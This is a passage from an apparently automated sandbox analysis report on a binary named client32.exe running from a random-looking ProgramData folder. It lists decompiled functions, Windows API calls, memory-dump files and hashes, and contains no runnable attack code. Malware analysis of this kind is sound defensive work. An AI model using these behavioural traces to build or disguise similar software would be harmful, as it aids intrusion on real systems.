                                                                                                                                                                                • Associated: 00000004.00000002.3004861029.0000000000C32000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_c30000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2164999147-0
                                                                                                                                                                                • Opcode ID: e0823aa734848aa78126a28de6ca7982cf614cf433aeeebf70776744511054f7
                                                                                                                                                                                • Instruction ID: f80a18157a2e994f707ab1b2727c97d2b8c2816649771ec054ca7ad19649a94b
                                                                                                                                                                                • Opcode Fuzzy Hash: e0823aa734848aa78126a28de6ca7982cf614cf433aeeebf70776744511054f7
                                                                                                                                                                                • Instruction Fuzzy Hash: 9E11C0304283C45EEF395F608A887EEFFA59F02380F2C0048ECE696146D7564ACBC7A5
                                                                                                                                                                                Function 11030DA7 Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1314093303-0
                                                                                                                                                                                • Opcode ID: 6e953a5d24e6e1f13a2616ebf877edbfbb28beacc0b8dce81e03f0c411ed08ef
                                                                                                                                                                                • Instruction ID: 29ddb86f1ee71f4f843e45b5762510f7855215705a57359ad908d625b59217dc
                                                                                                                                                                                • Opcode Fuzzy Hash: 6e953a5d24e6e1f13a2616ebf877edbfbb28beacc0b8dce81e03f0c411ed08ef
                                                                                                                                                                                • Instruction Fuzzy Hash: DEF08135E0521ACFDB14DFA5D998BADF774EF84319F0041A9D52A53680DF346540CB40
                                                                                                                                                                                Function 6C605C90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ioctlsocket.WSOCK32(939B34B3,4004667F,00000000,a3al), ref: 6C605D1F
                                                                                                                                                                                • select.WSOCK32(00000001,?,00000000,?,00000000,939B34B3,4004667F,00000000,a3al), ref: 6C605D62
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ioctlsocketselect
                                                                                                                                                                                • String ID: a3al
                                                                                                                                                                                • API String ID: 1457273030-3155256102
                                                                                                                                                                                • Opcode ID: b4dc9ab07501910666f8f5a93ab3dd0b361bbc100b5bcf5d3dec28da5b77bb1d
                                                                                                                                                                                • Instruction ID: f7dad2085f6b991f5ea496332aad1a8c17828dc650727aa44d3185215447cbe8
                                                                                                                                                                                • Opcode Fuzzy Hash: b4dc9ab07501910666f8f5a93ab3dd0b361bbc100b5bcf5d3dec28da5b77bb1d
                                                                                                                                                                                • Instruction Fuzzy Hash: DB213E70A012189BEB28CF14C9587EDB7B9EF49304F0081DAA80DA7681DB745F98DF98
                                                                                                                                                                                Function 111447F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,?,11144A43,?), ref: 111447FC
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\4dvs23l\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CurrentFileModuleNameProcess
                                                                                                                                                                                • String ID: C:\ProgramData\4dvs23l\client32.exe
                                                                                                                                                                                • API String ID: 2251294070-2690833437
                                                                                                                                                                                • Opcode ID: 1c167dac2943c3880edf84c13d6a33890db35611affdbb1526e99500c303518b
                                                                                                                                                                                • Instruction ID: b68e03ccdc6c4a6a2c274322f8faab7020ac6906b57b96b3185223f9365e196b
                                                                                                                                                                                • Opcode Fuzzy Hash: 1c167dac2943c3880edf84c13d6a33890db35611affdbb1526e99500c303518b
                                                                                                                                                                                • Instruction Fuzzy Hash: BE11CEB87803539BF704DFA5C9A4B19FBA4AB41B18F20883DE919D7E85EB71E444C780
                                                                                                                                                                                Function 11015580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000), ref: 11015597
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110155A8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseCreateFileHandle
                                                                                                                                                                                • String ID: \\.\NSWFPDrv
                                                                                                                                                                                • API String ID: 3498533004-85019792
                                                                                                                                                                                • Opcode ID: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                                                                                                                • Instruction ID: 8ee41b20f4352974833a803ddfcebdd3f772c34de5b97fa52423d1e1393adc22
                                                                                                                                                                                • Opcode Fuzzy Hash: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                                                                                                                • Instruction Fuzzy Hash: 51D09271A410386AF27055A6AD48F87AD099B026B5F220260B939E658486104D4186E0
                                                                                                                                                                                Function 1115CCA0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _calloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1679841372-0
                                                                                                                                                                                • Opcode ID: 84a74e7973a4ed6c5766658f94ef60504ff8670ca5cec04cb208393c98c84d4c
                                                                                                                                                                                • Instruction ID: 23015313aa3c4790eb0b31f5809972b43774ae16244dcdf9e0384501427d1f2b
                                                                                                                                                                                • Opcode Fuzzy Hash: 84a74e7973a4ed6c5766658f94ef60504ff8670ca5cec04cb208393c98c84d4c
                                                                                                                                                                                • Instruction Fuzzy Hash: 7F519F3560021AAFDB90CF58CC80F9ABBB9FF89744F108559E929DB344D770EA11CB90
                                                                                                                                                                                Function 11116E30 Relevance: 4.6, APIs: 3, Instructions: 69registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 11116E81
                                                                                                                                                                                • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?,?,?,?,00000000), ref: 11116EBE
                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 11116EC5
                                                                                                                                                                                  • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,11110200,75BF8400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseValue$Query
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 392431914-0
                                                                                                                                                                                • Opcode ID: 91831e38f7faa36204ca772dee291fe8d7fde7defd0a0f1837fb0600af181a69
                                                                                                                                                                                • Instruction ID: edf5b6ff414cef76fc351fb673ec4a61117703520949674c054a66456527b656
                                                                                                                                                                                • Opcode Fuzzy Hash: 91831e38f7faa36204ca772dee291fe8d7fde7defd0a0f1837fb0600af181a69
                                                                                                                                                                                • Instruction Fuzzy Hash: 2E11DD76201128BBE700CE58DC48FEBB76C9F84B29F048228FE198A189D371A605C7B0
                                                                                                                                                                                Function 6C608FB0 Relevance: 4.6, APIs: 3, Instructions: 57networkCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _memset.LIBCMT ref: 6C608FE4
                                                                                                                                                                                • getsockname.WSOCK32(?,?,00000010,?,030B2998,?), ref: 6C609005
                                                                                                                                                                                • WSAGetLastError.WSOCK32(?,?,00000010,?,030B2998,?), ref: 6C60902E
                                                                                                                                                                                  • Part of subcall function 6C605840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6C608F91,00000000,00000000,6C64B8DA,?,00000080), ref: 6C605852
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast_memsetgetsocknameinet_ntoa
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3066294524-0
                                                                                                                                                                                • Opcode ID: 4b83e50acde50704f2b5530f151763aa51325bd8d2ba6c88848e1a5ce9bd46fd
                                                                                                                                                                                • Instruction ID: f8748f4fbf68fdd6a877ffe723fff1bc64976f86086b3022936cdf4c12dbe393
                                                                                                                                                                                • Opcode Fuzzy Hash: 4b83e50acde50704f2b5530f151763aa51325bd8d2ba6c88848e1a5ce9bd46fd
                                                                                                                                                                                • Instruction Fuzzy Hash: 08112171E04118AFCB04DFA9D941AFEB7B8EB49214F00456AED05E7240E7759E188BD9
                                                                                                                                                                                Function 11112140 Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 11112185
                                                                                                                                                                                  • Part of subcall function 11169F04: __splitpath_helper.LIBCMT ref: 11169F46
                                                                                                                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1847508633-0
                                                                                                                                                                                • Opcode ID: 7cab8abdf99c62c575cdc03e191a434082262d5178fb78951523e1e8342a02ac
                                                                                                                                                                                • Instruction ID: c591a5ba9c17bf4ee1841d59d592da31fd18a085fce33aa04bf57df4da238aa2
                                                                                                                                                                                • Opcode Fuzzy Hash: 7cab8abdf99c62c575cdc03e191a434082262d5178fb78951523e1e8342a02ac
                                                                                                                                                                                • Instruction Fuzzy Hash: E4116175A4020CABEB14DF94CD42FE9F778AB48B04F5041D8E6246B1C0E7B02A48CBA5
                                                                                                                                                                                Function 111101B0 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • wsprintfA.USER32 ref: 111101E4
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                                                                                                • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                                                                                                                • API String ID: 4180936305-2664294811
                                                                                                                                                                                • Opcode ID: efbb0cd98578523b2184a95fccae7c292981f9ab07ac138ce4e456cb866a9b72
                                                                                                                                                                                • Instruction ID: 098e5996781ad60247c7fcf5caa4ca36f886f8102b778af333740a2f918ca33d
                                                                                                                                                                                • Opcode Fuzzy Hash: efbb0cd98578523b2184a95fccae7c292981f9ab07ac138ce4e456cb866a9b72
                                                                                                                                                                                • Instruction Fuzzy Hash: C0F0F6B6E4022863C7209AA49D01FEFF37C9F91609F0001A9FE05B7241EA75AA11C7E5
                                                                                                                                                                                Function 1109EE00 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE21
                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE28
                                                                                                                                                                                  • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                                                                                                                                  • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                                                                                                                                  • Part of subcall function 1109ED30: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00811480,00811480,00811480,00811480,00811480,00811480,00811480,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                                                                                                                                  • Part of subcall function 1109ED30: EqualSid.ADVAPI32(?,00811480,?,00000001,00000001), ref: 1109EDC3
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1109EE47
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
